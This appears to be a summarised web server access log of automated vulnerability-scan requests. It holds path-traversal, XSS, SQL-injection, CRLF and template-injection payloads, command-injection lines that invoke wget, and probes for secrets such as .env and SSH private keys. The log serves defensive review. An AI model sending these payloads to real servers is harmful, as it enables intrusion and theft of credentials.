1 GET /%u002e/WEB-INF/web.xml HTTP/1.1
1 GET /' HTTP/1.1
1 GET /(download)/etc/passwd HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.%2500./.%2500./etc/passwd HTTP/1.1
1 GET /.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/windows/win.ini HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/var/www/html/index.html HTTP/1.1
1 GET /.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./windows/win.ini HTTP/1.1
1 GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
1 GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../windows/win.ini HTTP/1.1
1 GET /..///////..////..//////windows/win.ini HTTP/1.1
1 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1
1 GET /..;/host-manager/html HTTP/1.1
1 GET /..;/manager/html HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /.angular-cli.json HTTP/1.1
1 GET /.angular.json HTTP/1.1
1 GET /.bash_history HTTP/1.1
1 GET /.bzr/branch/branch.conf HTTP/1.1
1 GET /.composer/composer.json HTTP/1.1
1 GET /.config/karma.conf.js HTTP/1.1
1 GET /.dbeaver/credentials-config.json HTTP/1.1
1 GET /.docker/config.json HTTP/1.1
1 GET /.editorconfig HTTP/1.1
48 GET /.env HTTP/1.1
1 GET /.esmtprc HTTP/1.1
1 GET /.ftpconfig HTTP/1.1
1 GET /.git/ HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.github/workflows/CI.yml HTTP/1.1
1 GET /.github/workflows/automerge.yml HTTP/1.1
1 GET /.github/workflows/build.yml HTTP/1.1
1 GET /.github/workflows/ci-daily.yml HTTP/1.1
1 GET /.github/workflows/ci-generated.yml HTTP/1.1
1 GET /.github/workflows/ci-issues.yml HTTP/1.1
1 GET /.github/workflows/ci-push.yml HTTP/1.1
1 GET /.github/workflows/ci.yml HTTP/1.1
1 GET /.github/workflows/coverage.yml HTTP/1.1
1 GET /.github/workflows/deploy.yml HTTP/1.1
1 GET /.github/workflows/lint.yml HTTP/1.1
1 GET /.github/workflows/main.yaml HTTP/1.1
1 GET /.github/workflows/pr.yml HTTP/1.1
1 GET /.github/workflows/publish.yml HTTP/1.1
1 GET /.github/workflows/push.yml HTTP/1.1
1 GET /.github/workflows/release.yml HTTP/1.1
1 GET /.github/workflows/smoosh-status.yml HTTP/1.1
1 GET /.github/workflows/snyk.yml HTTP/1.1
1 GET /.github/workflows/test.yaml HTTP/1.1
1 GET /.github/workflows/test.yml HTTP/1.1
1 GET /.github/workflows/tests.yml HTTP/1.1
1 GET /.gitignore HTTP/1.1
1 GET /.hg/hgrc HTTP/1.1
1 GET /.idea/WebServers.xml HTTP/1.1
1 GET /.idea/webServers.xml HTTP/1.1
1 GET /.idea/webservers.xml HTTP/1.1
1 GET /.licenserc.yaml HTTP/1.1
1 GET /.mailmap HTTP/1.1
2 GET /.npm/anonymous-cli-metrics.json HTTP/1.1
1 GET /.npmrc HTTP/1.1
1 GET /.phpspec.yml HTTP/1.1
1 GET /.phpunit.result.cache HTTP/1.1
1 GET /.redmine-cli HTTP/1.1
1 GET /.rubocop.yml HTTP/1.1
1 GET /.sass-lint.yml HTTP/1.1
1 GET /.scrutinizer.yml HTTP/1.1
1 GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1
1 GET /.ssh/authorized_keys HTTP/1.1
1 GET /.ssh/id_dsa HTTP/1.1
1 GET /.ssh/id_rsa HTTP/1.1
1 GET /.ssh/known_hosts HTTP/1.1
1 GET /.styleci.yml HTTP/1.1
1 GET /.svn/entries HTTP/1.1
1 GET /.tugboat HTTP/1.1
1 GET /.well-known/matrix/client HTTP/1.1
1 GET /.well-known/matrix/server HTTP/1.1
1 GET /.well-known/openid-configuration HTTP/1.1
1 GET /.wget-hsts HTTP/1.1
1 GET /.wgetrc HTTP/1.1
1 GET ///bin///querybuilder[.]feed HTTP/1.1
1 GET ///bin///querybuilder[.]json[.]servlet HTTP/1.1
1 GET ///bin///querybuilder[.]json HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]1[.]json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]4[.]2[.]1...json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]css?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]html?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]js?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json///a[.]png?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json;%250aa.css?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json;%250aa.html?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json;%250aa.ico?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json;%250aa.js?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///bin///wcm///search///gql[.]servlet[.]json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET ///system///sling///loginstatus HTTP/1.1
1 GET //uapi-cgi/certmngr.cgi?action=createselfcert&commonname=anything&country=AA&days=1&local=anything&organization=anything&organizationunit=anything&state=%24(wget%20http[:]//)&type=anything HTTP/1.1
1 GET /13.67.44.234.pem HTTP/1.1
1 GET /13.67.44.234/error.log HTTP/1.1
1 GET /13.67.44.234/errors.log HTTP/1.1
1 GET /2LM9bC6TM5tqNIIvWCqCXUstdQl.php%5Cx0A HTTP/1.1
1 GET /2LM9bXNXVSQh3j8vbBmN4OxZrt6 HTTP/1.1
1 GET /2LM9clD05ALX62KxpVT4iPlIy8G/..;/host-manager/html HTTP/1.1
1 GET /2LM9clD05ALX62KxpVT4iPlIy8G/..;/manager/html HTTP/1.1
1 GET /404 HTTP/1.1
2 GET /?2LM9ayxHhYRDQAegJdsesIm6k6A=9 HTTP/1.1
1 GET /?Express=aaaa&autoEscape&defaultFilter=e%27)var+require=global.require+%7C%7C+global[.]process[.]mainModule[.]constructor._load+require(%27child_process%27).exec(%27wget%20http[:]//%27)// HTTP/1.1
1 GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
1 GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /?action=edit&fileName=..\\..\\..\\windows\\win.ini&h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf HTTP/1.1
1 GET /?address_lat&address_lng&distance=10&lcats%5B%5D&location_search&nearby=off&search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?after_logout=https[:]//interact[.]sh&aiowpsec_do_log_out=1 HTTP/1.1
1 GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1
2 GET /?author=1 HTTP/1.1
1 GET /?calid=1&cpmvc_do_action=mvparse&cpmvc_id=1&delete=1&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22&f=edit&id=999&month_index=0&palette=0&paletteDefault=F00&start=a%22%3E%3Csvg/%3E%3C%22 HTTP/1.1
1 GET /?ct_baths_plus&ct_beds_plus&ct_brokerage=0&ct_city&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_keyword&ct_lotsize_from&ct_lotsize_to&ct_mls&ct_mobile_keyword&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_year_from&ct_year_to&ct_zipcode&lat&lng&search-listings=true HTTP/1.1
1 GET /?db=mysql&server=db&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&username=root HTTP/1.1
1 GET /?dev HTTP/1.1
1 GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?filename=/../../../../../../../../../../../../etc/passwd&option=com_helpdeskpro&original_filename=AnyFileName.exe&task=ticket.download_attachment HTTP/1.1
1 GET /?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?function=call_user_func_array&s=index/think\\app/invokefunction&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /?id=nuclei%25{128*128} HTTP/1.1
1 GET /?item_id=0%20union%20select%20sleep(5)%20--%20g&rest_route=/wc/v3/wishlist/remove_product/1 HTTP/1.1
1 GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1
1 GET /?layout=/etc/passwd HTTP/1.1
1 GET /?mp_idx=%22alert(%271%27)// HTTP/1.1
1 GET /?noptin_ns=email_click&to=https[:]//interact[.]sh HTTP/1.1
1 GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?phpinfo=-1 HTTP/1.1
1 GET /?pid=0&uid=0&url=test&visitorId=1331'+and+sleep(5)+or+'&wmcAction=wmcTrack HTTP/1.1
1 GET /?piereg_logout_url=true&redirect_to=https[:]//interact[.]sh HTTP/1.1
1 GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2LM9cke9dICT3jI3Qci9unLFmAK/)%3C/script%3E+ HTTP/1.1
1 GET /?pretty HTTP/1.1
1 GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1
1 GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1
1 GET /?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
1 GET /?url=http[:]//0177[.]0[.]0[.]1/server-status HTTP/1.1
1 GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1
1 GET /AccessAnywhere/%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255cwindows%25255cwin.ini HTTP/1.1
1 GET /Account/LogIn?hasAttemptedCookie=True&returnUrl=%2F HTTP/1.1
1 GET /Account/Login HTTP/1.1
1 GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminemail=test@test.com&adminname=test&adminpassword=ZWEvXw&adminusername=6FoRHo HTTP/1.1
1 GET /AirWatch/Login HTTP/1.1
1 GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
1 GET /Audio/1/hls/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ HTTP/1.1
1 GET /BSW_cxttongr.htm HTTP/1.1
1 GET /CACHE/sdesktop/data.xml HTTP/1.1
1 GET /CACHE/sdesktop/install/start.htm HTTP/1.1
1 GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1
1 GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1
1 GET /CHANGELOG.md HTTP/1.1
1 GET /CHANGELOG.txt HTTP/1.1
1 GET /CgiStart?page=Single HTTP/1.1
1 GET /Content/ckeditor/samples/old/replacebyclass.html HTTP/1.1
1 GET /Default.aspx?pid=Login HTTP/1.1
1 GET /Default.aspx HTTP/1.1
1 GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1
1 GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1
1 GET /Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form> HTTP/1.1
1 GET /FrontController HTTP/1.1
1 GET /Gruntfile.coffee HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1
1 GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1
1 GET /Login.aspx HTTP/1.1
1 GET /Login.jsp HTTP/1.1
1 GET /MRTG/ HTTP/1.1
1 GET /Main_Login.asp HTTP/1.1
1 GET /MicroStrategy/servlet/taskProc?srcURL=https[:]//google[.]com&taskContentType=xml&taskEnv=xml&taskId=shortURL HTTP/1.1
1 GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1
1 GET /MyErrors.log HTTP/1.1
1 GET /NCFindWeb?filename=WEB-INF/web.xml&service=IPreAlertConfigService HTTP/1.1
1 GET /Orion/Login.aspx HTTP/1.1
1 GET /PRTG/index.htm HTTP/1.1
1 GET /PSIA/index HTTP/1.1
1 GET /Partners/application/configs/application.ini HTTP/1.1
1 GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /Pipfile HTTP/1.1
1 GET /PolicyMgmt/policyDetailsCard.do?poID=19&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E&typeID=3 HTTP/1.1
1 GET /QH.aspx?action=download&fileName=.%2fQH.aspx&responderId=ResourceNewResponder HTTP/1.1
1 GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1
1 GET /README.md HTTP/1.1
1 GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1
1 GET /ReportServer?cmd=sc_getconnectioninfo&op=fr_server HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Reports/Pages/Folder.aspx HTTP/1.1
1 GET /RestAPI/ImportTechnicians HTTP/1.1
1 GET /SOGo HTTP/1.1
1 GET /SSI/Auth/ip_snmp.htm HTTP/1.1
1 GET /STATE_ID/123/agentLogUploader HTTP/1.1
1 GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1
1 GET /Schemas/$%257B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%257D HTTP/1.1
1 GET /Solar_Menu.php HTTP/1.1
1 GET /Solar_SlideSub.php?bgcolor=green&id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22 HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /Thumbs.db HTTP/1.1
1 GET /Trace.axd HTTP/1.1
1 GET /Upload/test/2LM9brJNYerIiDN7AylSN371HGs.php HTTP/1.1
1 GET /Uploads/2LM9cA7GW9JWuK0j75pcxio7P7R.php?cmd=echo+\"roxyfileman\"+|+rev HTTP/1.1
1 GET /Vagrantfile HTTP/1.1
1 GET /Visitor/bin/WebStrings.srf?file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
2 GET /WAN_wan.htm?.gif HTTP/1.1
1 GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1
1 GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1
1 GET /WebConsole/api/security/auth/loginServers HTTP/1.1
1 GET /WebInterface/login.html HTTP/1.1
1 GET /WebReport/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml HTTP/1.1
1 GET /WebReport/ReportServer?cmd=sc_getconnectioninfo&op=fr_server HTTP/1.1
1 GET /WebReport/ReportServer HTTP/1.1
1 GET /_/.ssh/authorized_keys HTTP/1.1
1 GET /__clockwork/app HTTP/1.1
1 GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1
1 GET /_admin/index.html HTTP/1.1
1 GET /_all/_search HTTP/1.1
1 GET /_cat/indices?v HTTP/1.1
1 GET /_darcs/prefs/binaries HTTP/1.1
1 GET /_debug_toolbar/ HTTP/1.1
1 GET /_ignition/health-check HTTP/1.1
1 GET /_notes/dwsync.xml HTTP/1.1
1 GET /about/../tree?action=get HTTP/1.1
1 GET /account/register HTTP/1.1
1 GET /actuator/favicon.ico HTTP/1.1
1 GET /actuator/features HTTP/1.1
1 GET /actuator/flyway HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/info HTTP/1.1
1 GET /actuator/jolokia/list HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1
1 GET /actuator/jolokia HTTP/1.1
1 GET /actuator/loggers HTTP/1.1
1 GET /actuator/prometheus HTTP/1.1
1 GET /actuator HTTP/1.1
1 GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1
1 GET /adjuncts/3a890183/ HTTP/1.1
1 GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1
1 GET /adm/krgourl.php?DOCUMENT_ROOT=http[:]// HTTP/1.1
2 GET /admin.php HTTP/1.1
1 GET /admin/?a=doSearchParameter&appno=0+union+select+98989*443131,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1
1 GET /admin/File/DownloadFile?delete=0&filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd HTTP/1.1
2 GET /admin/ HTTP/1.1
1 GET /admin/airflow/login HTTP/1.1
1 GET /admin/auth/login HTTP/1.1
2 GET /admin/config.php HTTP/1.1
1 GET /admin/configs/application.ini HTTP/1.1
1 GET /admin/dashboard.php HTTP/1.1
1 GET /admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> HTTP/1.1
1 GET /admin/elfinder/elfinder-cke.html HTTP/1.1
1 GET /admin/error.log HTTP/1.1
1 GET /admin/errors.log HTTP/1.1
1 GET /admin/histograms?fmt=plot_cdf&h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&log_scale=true HTTP/1.1
1 GET /admin/index.php HTTP/1.1
1 GET /admin/init HTTP/1.1
1 GET /admin/log/error.log HTTP/1.1
1 GET /admin/login.html?lang=en HTTP/1.1
2 GET /admin/login/?next=/admin/ HTTP/1.1
1 GET /admin/login HTTP/1.1
1 GET /admin/logs/errors.log HTTP/1.1
1 GET /admin/pma/server_import.php HTTP/1.1
1 GET /admin/server_import.php HTTP/1.1
1 GET /admin/user.php HTTP/1.1
1 GET /admin HTTP/1.1
1 GET /adminer.php HTTP/1.1
1 GET /adminer/ HTTP/1.1
1 GET /adminer?elastic=interact.sh&username HTTP/1.1
1 GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1
1 GET /administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /ads/www/delivery/lg.php?dest=http[:]//interact[.]sh HTTP/1.1
1 GET /adserve/www/delivery/lg.php?dest=http[:]//interact[.]sh HTTP/1.1
1 GET /adserver/www/delivery/lg.php?dest=http[:]//interact[.]sh HTTP/1.1
1 GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1
1 GET /agc/vicidial_mysqli_errors.txt HTTP/1.1
1 GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortBy=dateCreatedInt&sortDirection=desc HTTP/1.1
1 GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=0&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /ajax/telemetry.php HTTP/1.1
1 GET /alps/profile HTTP/1.1
1 GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1
1 GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1
1 GET /anchor/errors.log HTTP/1.1
1 GET /angular.json HTTP/1.1
2 GET /anonymous-cli-metrics.json HTTP/1.1
1 GET /anything_here HTTP/1.1
1 GET /apache-default/phpmyadmin/ HTTP/1.1
1 GET /api/2LM9cEME0Pc7Z3jPKnCDWR4wQZd HTTP/1.1
1 GET /api/ HTTP/1.1
1 GET /api/api-browser/ HTTP/1.1
1 GET /api/axis HTTP/1.1
1 GET /api/components/suggestions?recentlyBrowsed HTTP/1.1
1 GET /api/console/api_server?apis=../../../../../../../../../../../etc/passwd&sense_version=%40%40SENSE_VERSION HTTP/1.1
1 GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1
1 GET /api/get_device_details HTTP/1.1
1 GET /api/group/list HTTP/1.1
1 GET /api/jsonws/invoke HTTP/1.1
1 GET /api/jsonws HTTP/1.1
1 GET /api/liferay HTTP/1.1
1 GET /api/ping?count=5&host=cat%20/etc/passwd&port=80&source=1.1.1.1&type=icmp HTTP/1.1
1 GET /api/profile HTTP/1.1
1 GET /api/scrape/kube-system HTTP/1.1
1 GET /api/search/attribute?tf_version=%27+and+(select%20pg_sleep(10))+ISNULL--&versionid=* HTTP/1.1
1 GET /api/settings/values HTTP/1.1
1 GET /api/sso/v2/sso/jwt?error_url=http[:]//interact[.]sh HTTP/1.1
1 GET /api/status HTTP/1.1
1 GET /api/system/deviceinfo HTTP/1.1
1 GET /api/users/admin/check HTTP/1.1
1 GET /api/v1/cluster/summary HTTP/1.1
1 GET /api/v1/namespaces/default/services HTTP/1.1
1 GET /api/v1/pods HTTP/1.1
1 GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1
1 GET /api/v1/targets HTTP/1.1
1 GET /api/v3/users HTTP/1.1
1 GET /api/xml HTTP/1.1
1 GET /api HTTP/1.1
1 GET /apiclient/index.jsp HTTP/1.1
1 GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1
1 GET /aplicacao/application/configs/application.ini HTTP/1.1
1 GET /app.yaml HTTP/1.1
1 GET /app.yml HTTP/1.1
1 GET /app/config/security.yml HTTP/1.1
1 GET /app/settings.py HTTP/1.1
1 GET /app/template/Login.vm HTTP/1.1
1 GET /application.ini HTTP/1.1
1 GET /application.yaml HTTP/1.1
1 GET /application.yml HTTP/1.1
1 GET /application/configs/application.ini HTTP/1.1
1 GET /application/logs/access.log HTTP/1.1
1 GET /application/logs/application.log HTTP/1.1
1 GET /application/logs/default.log HTTP/1.1
